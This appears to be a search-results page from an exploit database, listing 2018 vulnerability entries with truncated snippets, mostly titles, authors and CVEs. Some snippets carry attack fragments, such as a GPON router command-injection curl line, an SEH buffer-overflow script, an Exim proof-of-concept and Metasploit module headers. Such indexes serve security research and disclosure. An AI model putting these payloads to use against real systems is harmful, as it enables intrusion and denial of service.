47904 matches found
Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
Linux/x86 - Read /etc/passwd Shellcode 62 bytes. Shellcode exploit for Linuxx86 platform / ; Title : Linux/x86 - Read /etc/passwd Shellcode 62 bytes ; Date : May, 2018 ; Author : Nuno Freitas ; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/ ; Twitter :...
Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery
Exploit Title: Fastweb FASTgate 0.00.47 CSRF Date: 09-05-2018 Exploit Authors: Raffaele Sabato Contact: https://twitter.com/syrion89 Vendor: Fastweb Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/ Version: 0.00.47 CVE: CVE-2018-6023 I DESCRIPTION...
MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting
Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting Date: 4/20/2018 Author: 0xB9 Contact: luxorforums.com/User-0xB9 or 0xB9atpm.me Software Link: https://community.mybb.com/mods.php?action=view&pid=914 Version: 1.1 Tested on: Ubuntu 17.10 CVE: CVE-2018-10580 1...
Mantis Bug Tracker 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mantis manageprojpage PHP Code Execution', 'Description' = %q Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote Code...
ModbusPal 1.6b - XML External Entity Injection
Exploit Title: ModbusPal XXE Injection + Date: 05-08-2018 + Exploit Author: Trent Gordon + Vendor Homepage: http://modbuspal.sourceforge.net/ + Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files + Version: 1.6b + Tested on: Ubuntu 16.04 with Java 1.8.0151...
Dell Touchpad - 'ApMsgFwd.exe' Denial of Service
/ Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service Author: Souhail Hammou Vendor Homepage: https://www.alps.com/ Tested on : Alps Pointing-device Driver 10.1.101.207 CVE: CVE-2018-10828 / include include include / Details: ========== ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad...
Linux/x86 - Bind (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)
Linux/x86 - Bind 9443/TCP Shell + fork + Null-Free Shellcode 113 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux x86 TCP Bind Shell + fork - 113 bytes NULL Free Author: Amine Kanane Student-ID: SLAE - 1203 Desc: Listen for a connection on Local Port 9443 and spawn a command shell Th...
Microsoft Windows FxCop 10/12 - XML External Entity Injection
Exploit Title: Microsoft Windows FxCop 10/12 - XML External Entity Injection Date: 2018-03-15 Exploit Author: Debashis Pal Vendor Homepage: www.microsoft.com Version: Microsoft Windows "FxCop" v10-12 CVE : N/A Greetz: indoushka|Eduardo|Dirty0tis Security Issue: ================ FxCop is vulnerabl...
Allok Video Splitter 3.1.12.17 - Denial of Service
Exploit Title: Allok Video Splitter 3.1.1217 Date: 2018-05-09 Exploit Author: Achilles Vendor Homepage: http://www.alloksoft.com/ Vulnerable Software: http://www.alloksoft.com/allokvsplitter.exe Tested on OS: Windows 7 64-bit DE Steps to reproduce: Copy the contents of the file Evil.txt and paste...
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution', 'Description' = %q This module exploits a code injection vulnerability...
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'PlaySMS import.php Authenticated CSV File Upload Code Execution', 'Description' = %q This module exploits an authenticated file upload remote cod...
Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Palo Alto Networks readSessionVarsFromFile Session Corruption', 'Description' = %q This module exploits a chain of vulnerabilities in Palo Alto...
FTPShell Client 6.7 - Buffer Overflow
-- coding: utf-8 -- Exploit Title: FTPShell Client 6.7 - Remote Buffer Overflow Date: 2018-01-03 Exploit Author: Sebastián Castro @r4wd3r Vendor Homepage: http://www.ftpshell.com/index.htm Software Link: http://www.ftpshell.com/download.htm Version: 6.7 Tested on: Windows Server 2008 R2 x64,...
2345 Security Guard 3.7 - '2345NetFirewall.sys' Denial of Service
/ Exploit Title: 2345 Security Guard 3.7 - Denial of Service Date: 2018-05-08 Exploit Author: anhkgg Vendor Homepage: http://safe.2345.cc/ Software Link: http://dl.2345.cc/2345pcsafe/2345pcsafev3.7.0.9345.exe Version: v3.7 Tested on: Windows 7 x86 CVE : CVE-2018-10809 BSOD caused of...
Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)
Linux/x86 - execve/bin/sh + NOT Encoded Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform / ; Title : Execve /bin/sh Shellcode encoded with NOT ; Date : May, 2018 ; Author : Nuno Freitas ; Twitter : @nunof11 ; SLAE ID : SLAE-1112 ; Size : 27 bytes ; Tested on : i686 GNU/Linux section...
GNU wget - Cookie Injection
GNU Wget Cookie Injection CVE-2018-0494 ========================================= The latest version of this advisory is available at: https://sintonen.fi/advisories/gnu-wget-cookie-injection.txt Overview -------- GNU Wget is susceptible to a malicious web server injecting arbitrary cookies to th...
DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
Exploit Title: DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow SEH Date: 2018-05-04 Exploit Author: Youssef mami Vendor Homepage: https://www.devicelock.com/freeware.html/ Version: 5.72 CVE : CVE-2018-10655 Security Issue: DeviceLock Plug and Play Auditor "DLPnpAuditor.exe" is...
HWiNFO 5.82-3410 - Denial of Service
!/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: HWiNFO 5.82-3410 - Denial of Service Date: 05-04-18 Vulnerable Software: HWiNFO 5.82-3410 Vendor Homepage: https://www.hwinfo.com/ Version: 5.82-3410 Software Link: https://www.hwinfo.com/files/hwi582.exe Tested On: Windows 7 x86...
CSP MySQL User Manager 2.3.1 - Authentication Bypass
Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass Date: 2018-05-04 Exploit Author: Youssef mami Vendor Homepage: https://code.google.com/archive/p/cspmum/ Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip Version:...
WordPress Plugin User Role Editor < 4.25 - Privilege Escalation
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress User Role Editor Plugin Privilege Escalation', 'Description' = %q The WordPress User Role Editor plugin prior to v4.25, is lacking an...
IceWarp Mail Server < 11.1.1 - Directory Traversal
Vendor: IceWarp http://www.icewarp.com Product: IceWarp Mail Server Version affected: 11.1.1 and below Product description: IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection. IceWarp Mail Server ...
Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/post/windows/reflectivedllinjection' class MetasploitModule 'Windows WMI Recieve Notification Exploit', 'Description' = %q This module exploits an...
Google Chrome V8 - Object Allocation Size Integer Overflow
There's an integer overflow in computing the required allocation size when instantiating a new javascript object. See the following code in objects.cc // static bool JSFunction::CalculateInstanceSizeForDerivedClass Handle function, InstanceType instancetype, int requestedembedderfields, int...
WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting
Exploit Title: WF Cookie Consent - Authenticated Persistent Cross-Site Scripting Date: 23/04/2018 Exploit Author: B0UG Vendor Homepage: http://www.wunderfarm.com/ Software Link: https://en-gb.wordpress.org/plugins/wf-cookie-consent/ Version: Tested on version 1.1.3 older versions may also be...
JasperReports - (Authenticated) File Read
TIBCO’s JasperReports string = wrapper.getParameterValues"page" To: getResource @ DirResourceSet.java:101 file = new File/home/rhino/jasperreports...mcat/webapps/jasperserver,"/WEB-INF/jsp/modules/administer/adminImport.jsp" Due to a lack of input validation we found ourselves with the capability...
GPON Routers - Authentication Bypass / Command Injection
!/bin/bash echo "+ Sending the Command… " We send the commands with two modes backtick and semicolon ; because different models trigger on different devices curl -k -d "XWebPageName=diag&diagaction=ping&wanconlist=0&desthost=$2;$2&ipv=0" $1/GponForm/diagForm?images/ 2/dev/null 1/dev/null echo "+...
WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free
input:enabled content: urlfoo; padding-top: 0vmin .class4 -webkit-transform: scale1, 255; function jsfuzzer document.head.appendChildkg; var test = input.scrollHeight; ::ptr const /Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x8664+0xe0a06 1 0x3000e09d8...
Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)
!/usr/bin/python Exploit Title: Easy MPEG to DVD Burner 1.7.11 SEH Local Buffer Overflow Date: 2018-05-02 Exploit Author: Marwan Shamel Software Link: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html Version: 1.7.11 Tested on: Windows 7 Enterprise SP1 32 bit Special thanks to my...
LibreOffice/Open Office - '.odt' Information Disclosure
!/usr/bin/python Exploit Title: Malicious ODF File Creator Date: 1st May 2018 Exploit Author: Richard Davy Vendor Homepage: https://www.libreoffice.org/ Software Link: https://www.libreoffice.org/ Version: LibreOffice 6.0.3, OpenOffice 4.1.5 Tested on: Windows 10 Quick script/POC code to create a...
Call of Duty Modern Warefare 2 - Buffer Overflow
A few years ago, I became aware of a security issue in most Call of Duty games. Although I did not discover it myself, I thought it might be interesting to see what it could be used for. Without going into detail, this security issue allows users playing a Call of Duty match to cause a buffer...
Exim < 4.90.1 - 'base64d' Remote Code Execution
!/usr/bin/python import time import socket import struct s = None f = None def logo: print print " CVE-2018-6789 Poc Exploit" print "@straightblast ; [email protected]" print def connecthost, port: global s global f s = socket.createconnectionhost,port f = s.makefile'rw', bufsize=0 def p...
Adobe Reader PDF - Client Side Request Injection
% a PDF file using an XFA % most whitespace can be removed truncated to 570 bytes or so... % Ange Albertini BSD Licence 2012 % modified by InsertScript %PDF-1. % can be truncated to %PDF-\0 1 0 obj stream 1 endstream endobj trailer /XFA 1 0 R /Pages...
Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service
What do you need to know? Tenable Research has discovered a critical remote code execution vulnerability in Schneider Electric’s InduSoft Web Studio and InTouch Machine Edition. What's the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary...
Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Metasploit msfd Remote Code Execution via Browser', 'Description' = %q Metasploit's msfd-service makes it possible to get a msfconsole-like...
xdebug < 2.5.5 - OS Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'xdebug Unauthenticated OS Command Execution', 'Description' = %q Module exploits a vulnerability in the eval command present in Xdebug versions...
Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery
SSRF(Server Side Request Forgery) in Cockpit 0.4.4-0.5.5 CVE-2018-9302 Cockpit CMS repairs CVE-2017-14611, but it can be bypassed, SSRF still exist, affecting the Cockpit CMS 0.4.4-0.5.5 versions.I've been tested success of "Cockpit CMS" lastest version. Product Download: Cockpit...
TBK DVR4104 / DVR4216 - Credentials Leak
-- coding: utf-8 -- import json import requests import argparse import tableprint as tp class Colors: BLUE = '\03394m' GREEN = '\03332m' RED = '\0330;31m' DEFAULT = '\0330m' ORANGE = '\03333m' WHITE = '\03397m' BOLD = '\0331m' BRCOLOUR = '\0331;37;40m' banner = ''' ..--.. ..... .-- ..... . .": "-...
Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC)
PoC command injection in BLE service of Norton Core Secure WiFi Router CVE-2018-5234 For more information read paper. To demonstrate the exploitation, we will use: - OS GNU/Linux; - Bluetooth dongle adapter; - BlueZ utility for testing Bluetooth connection. In order to use the script, we will nee...
Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Metasploit msfd Remote Code Execution', 'Description' = %q Metasploit's msfd-service makes it possible to get a msfconsole-like interface over a...
WordPress Plugin Responsive Cookie Consent 1.7 / 1.6 / 1.5 - (Authenticated) Persistent Cross-Site Scripting
Exploit Title: Wordpress Responsive Cookie Consent 1.7 / 1.6 / 1.5 - Authenticated Persistent Cross-Site Scripting Date: 2018-04-20 Exploit Author: B0UG Vendor Homepage: http://www.jameskoussertari.co.uk/ Software Link: https://en-gb.wordpress.org/plugins/responsive-cookie-consent/ Version: Teste...
Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root
Exploit Title: Nagios XI 5.2.6-9, 5.3, 5.4 Chained Remote Root Date: 4/17/2018 Exploit Authors: Benny Husted, Jared Arave, Cale Smith Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.nagios.com/ Software Link:...
Navicat < 12.0.27 - Oracle Connection Overflow
!/usr/bin/python Title: Navicat Create new Oracle Connection paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow. filename="navicatPOC.txt" junk = "A" 1502 nseh = "\x4C\x4C\x77\x04" seh= "\x75\x2a\x01\x10" nseh = "B" 4 seh = "C" 4 fill = "D" 4000 buffer = ju...
WordPress Plugin Form Maker 1.12.20 - CSV Injection
Exploit Title: Wordpress Plugin Form Maker version 1.12.20 vulnerable to to Formula Injection CSV Injection Google Dork: N/A Date: 27-04-2018 Exploit Author: Jetty Sairam Software Link: https://wordpress.org/plugins/form-maker/ Affected Version: 1.12.20 and before Category: Plugins and Extensions...
Apple macOS/iOS - ReportCrash mach port Replacement due to Failure to Respect MIG Ownership Rules
/ ReportCrash is the daemon responsible for making crash dumps of crashing userspace processes. Most processes can talk to ReportCrash via their exception ports either task or host level. You would normally never send a message yourself to ReportCrash but the kernel would do it on your behalf whe...
Apple macOS 10.13.2 - Double mach_port_deallocate in kextd due to Failure to Comply with MIG Ownership Rules
Here's a kextd method exposed via MIG com.apple.KernelExtensionServer kernreturnt kextmanagerunlockkextload machportt server, machportt client kernreturnt migresult = KERNFAILURE; if gClientUID != 0 OSKextLog/ kext / NULL, kOSKextLogErrorLevel | kOSKextLogIPCFlag, "Non-root kextutil doesn't need ...
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free
define GNUSOURCE include include include include include include include include include include include include include include include include include include include struct sockaddrllc short sllcfamily; short sllcarphrd; unsigned char sllctest; unsigned char sllcxid; unsigned char sllcua;...
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Drupalgeddon3', 'Description' = %q CVE-2018-7602 / SA-CORE-2018-004 A remote code execution vulnerability exists within multiple subsystems of...
TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Remote Reboot
Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot Date: 25/04/2018 Exploit Author: Wadeek Vendor Homepage: https://www.tp-link.com/ Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html Category: dos 1. www.shodan.io with title...
October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting
Exploit Title: October CMS User Plugin v1.4.5 - Persistent Cross-Site Scripting Date: 2018-04-03 Author: 0xB9 Software Link: https://octobercms.com/plugin/rainlab-user Version: 1.4.5 Tested on: Ubuntu 17.10 CVE: CVE-2018-10366 1. Description: Front-end user management for October CMS. Allows...
Frog CMS 0.9.5 - Persistent Cross-Site Scripting
Exploit Title: Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via "Admin Site title" in Settings Date: 2018-04-23 Exploit Author: Wenming Jiang Vendor Homepage: https://github.com/philippe/FrogCMS Software Link: https://github.com/philippe/FrogCMS Version: 0.9.5 Tested on: php 5.6...